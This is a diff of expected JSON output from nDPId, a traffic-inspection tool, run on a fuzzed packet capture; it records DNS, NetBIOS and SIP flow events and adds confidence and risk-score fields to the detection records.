-00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470474627,"flow_last_seen":1120470478633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470478633,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470482638,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470474627,"flow_last_seen":1120470478633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470478633,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470482638,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00553{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1120469540839,"flow_last_seen":1120470447948,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1120469540839,"flow_last_seen":1120470447948,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470385615,"flow_last_seen":1120470394622,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1120470490640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470490640,"pkt":"ADBUADRWAODlAW69CABFAABEa2cAAIARS+7AqAECwKgBAQrmADUAMMHtYusAAAABAAAA6QAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"ts_msec":1120470490642,"pkt":"AJLtAW69ADBUADRWCABFAABbAABADUARtz7AqAEBwKgBAgA1CuYAR6QBYuuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01092{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1120470490782,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"ts_msec":1120470490782,"pkt":"AODtAW69ADBUADRWCABFAAIBAABAADcRiizU8iEjwCVzABPEE8QB7RaaU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA3OCBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9M2EyZDBkYw0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0NC5kaz47dGFnPTAwLTk0JXMALTE3MDFiNmFiLTEzOTM1YzgzNA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyYWNlaXZlZD04MC4yMzAuMjE5cjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5SEc0YktucDYxMDAxODczLTQzYmViWWE1MTkyLjE2OC4xLjINCldXVy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9mY2U9IjE3MDFiNjliNDdiNTFjNmQ2NmM5ZTQ1MDNjNjc5YzIiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG30TUQ1DQpDb250ZW50Lf5lbmd0aDogMA0KDQo="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470491041,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1120470491041,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470491041,"pkt":"ADBUADRWAODtAW69CABFAABIa2kAAIARS+jAqE8CwKgBAQrnADUANKZlgusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470491041,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470491041,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1120470492042,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470492042,"pkt":"ADBUADRWAODtAW69CABFAABIa2oAAIARS+fAqAE1wKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470494045,"pkt":"ADBUADRWAODtAW69CABFAABIayVzAIARS+bAqAECwKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1120470494127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470494127,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa2wAAIARSuHAqAECwMIB\/wCJAIkAOltkhTcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470495627,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
